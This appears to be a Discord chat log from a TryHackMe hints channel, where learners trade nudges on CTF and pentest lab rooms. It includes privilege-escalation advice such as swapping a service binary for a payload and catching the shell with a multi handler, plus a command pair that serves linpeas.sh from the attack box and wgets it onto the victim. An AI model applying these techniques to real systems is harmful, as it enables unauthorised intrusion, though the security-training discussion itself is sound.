@stone oyster try looking at the raw file, you want to see everything in it, not a rendered version
you could try what I hinted first
imagine you wanted to look at the contents of a binary file
how would you do that
I hate to say it, but I don't know. But I will research and see if I can find an answer.
Ty
if you try googling "look at the contents of a binary file" you'll find it pretty quick I'm sure
if this all seems very cryptic that's because this is #room-hints, we try not to give the answers but nudge so you can find them yourself
I know. I get that.
I don't like having the answers given to me.
Most of the time a nudge is all I need.
lol
Most of the time.
Oy....so take the code and decipher it?
I have a stackexchange link
me too
did you read what you got?
i'd recommend man xxd too and learn a little about a very useful command
On the right it's the same text as if I cat. I ran it thru a hex decoder and it showed the same message.
The answer isn't the typical flag of long code.
it's 6 characters
ok, can you copy the output here in spoiler tags? (surround it with ||)
cause it shouldn't show you the same message
lol
I tell ya' what. I gotta' get for now. I will look into man xxd later and see if there's something that I missed.
Thanks for the nudge.
k
Is it ok to send you screenshot?
sure
man this last steel mountain task is really kicking my erse lol.... i've actually gotten to the point where i've replaced the ASCService.exe with my file and i'm able to start the service. netcat responds and says the connection is received, but i never get shell access
Use a multi handler.
Set the payload correctly
If you're using a staged payload then you 100% need multi handler as your listener
got it, worked like a charm, thanks
On basic pentest what is the correct way to display the smb information of users?
The attackbox doesn't have enum4linux and i cant install via apt?
It's got it as a script on the system
where?
Cmn said recently
cmn?
ahh thanks
still managed to get one user without it lol not sure that was intended
okay im extremely stuck on the priv esc there is no linenum
ahh okay it's in the additional tools
how do i run the linenum on the ssh server?
you transfer it and run it
how to transfer i tried google and scp but the file wasn't there?
scp, wget and http.server, you can just get it straight from the linenum github
lots of ways
didnt think of that thanks
okay so wget doesn't work and http server no module?
tried nano aswell?
Well you can't wget like that because the machine doesn't have internet connection
And in the scp command just remove the last / in the directory, try /home/jan instead of /home/jan/, not sure if that's the problem though
Didnt work it just has no output and when i check the files not there
Try copy to /tmp
I tried that too the files just arent copying over i cant nano the file because of root privs ill just come back to it. Only need the last password.
And about: python3 -m http.server (AttackBox) (directory with linpeas.sh) | go to /tmp and wget http://ipfromVPN:8000/linpeas.sh (victim machine)? If you need to edit, try vi/vim.
Python has no module named http.server i could script it but meh. The wget just sits and hangs on connecting i think its the attack box ill try it on a vm instead
Wait, only python?
Try: python -m SimpleHTTPServer
I tried that same error message lol
Lmao
just try pip3 install httpserver
But he need internet, right? AttackBox has internet?
Its just hanging again? Did i go over minutes or something
I had to watch the video included. I followed what he did with scp to a t. And still nothing
It doesnt transfer
I just reset the box but i used the one in the video and scp linenum.sh jan@10.10.32.239:/dev and others like 239/dev/
And /tmp
I just want to make sure I know what I'm seeing and thinking. For the Linux Challenges room, flag23, the directions say to find it, then reverse it. They want me to report the flag backwards?
If its a file it means reverse engineer usually.
and yet, I tried typing it in backwards and it went.
That was just kind of unsettling in my head.
Maybe I'm tired.
@white salmon I started an AttackBox, logged as jan, used wget, linpeas.sh was copied and running ok, that's crazy..
What directory did you use
/tmp
What the hell
Flag24, the C compiled flag. I tried the gcc and no matter what I do I keep getting a list of what looks like errors.
Linux Challenges?
yeah buddy
Sorry, I can't help, don't have access to this room.
It is a subscriber room
You're subscriber, so you can access..
oh.....interesting.
lol
Maybe the last payment I made hasn't run out yet.
So...I did ./flag and get the message.
Checked the hint and it asks who can access. I know who can access.
So I need to do the absolute most basic reverse engineering
It's suggesting a program that finds strings in files
oh.
Anybody open for a ?
@clear saddle It's always better to just directly ask your question. If someone can help then they will.
We don't know if we can help unless we know the question, after all
I know how to shh but the password for the linux course must have been changed.
it says use shiba 1 but this does not get me in
You don't share virtual machines
The password hasn't been changed
Make sure you're deploying the Learn Linux VM not the attack box
They're totally separate.
If you wanna' ask about programming, one of these folks can help. If you wanna' ask about comfort food, then ask me.
Don't use that word here, it's a slur
In task one
There's a deploy button
VMs are attached to tasks rather than rooms. A room is made up of several tasks. A task can have: a download, a VM, or neither attached.
Is the message in the flag24 file supposed to suggest a command/program to find a string with?
or just suggesting that i do that?
The question itself suggests that you do that
ok. thank you.
Analyse the flag 24 compiled C program. Find a command that might reveal human readable strings when looking in the source code.
Is there a particular way or command or program to use?
Yep. A specific command makes it easy
ty
@inland onyx also, it shouldn't say source code here. linuxctf task 4
You're not looking in the source code, considering you're looking in a compiled binary
I'm going to bed, but I found what I need to do the work tomorrow.
night ya'll.
thanks for your help.
Hi there,
regarding room startup I do have access to FTP, found the related folder on the website but don't know where to look?
tried bruteforcing ssh & ftp with the username in the FTP share without success, is it the correct way to go?
No hints/help are allowed for new rooms till 72 hours passes.
Check rule 13.
I'm stuck on 2 questions to complete the physical security room. intro. could someone please help me.... task 6 Q.5 - An improperly hung door which opens away from you can be bypassed using this type of tool?, and the other one was task 6 last question -Adams Rite hardware fixtures are susceptible to a bypass where a wire is snaked through the keyway and actuates the locking mechanism behind it, what could prevent this bypass?
if someone could assist thanks
missing those ones myself @polar mountain
Keeps searching my dude, you'll get them eventually, watch the videos provided and use the information the questions gives you
Thanks mate
Room: https://tryhackme.com/room/borderlands
I have credentials on the website but i don't know how to answer the different questions of the room
Guys, for y'all that completed the zthlinux room (the one that teaches some commands, ssh...) how did you go through finding the last answer inside ||/var/log||?
is that where it says the flag is?
The room is a walkthrough room... Which bit?
@simple mountain Yes, after getting all users' passwords
passwords? are you sure you are in Kenobi room?
Oh sorry, mixed you up with the other guy...
zthlinux is a big room - Which task are you on?
The last one, the little challenge. I finished it already but I want to know how other people went through it, 'cause there is no hint there as where or how to get it, I spent a lot of time to get to it
the 'True ending'?
Yes
I mean, finding the file is pretty easy, but the challenge gives no hint on how to get it, just throw the challenge at you
Oh I see. Thats part of it, and how most other challenges are set out. But HOW to do it is using the skills that have just been taught.
Yea, I thought so too, so I tried messing with permissions, shell scripts and such, but in the end I just got lucky I guess 'cause I didn't need any of those
In your case, how did you find the ||/var/log/test1234||?
And why did you search there for that file?
IIRC, I searched for files owned by a certain user.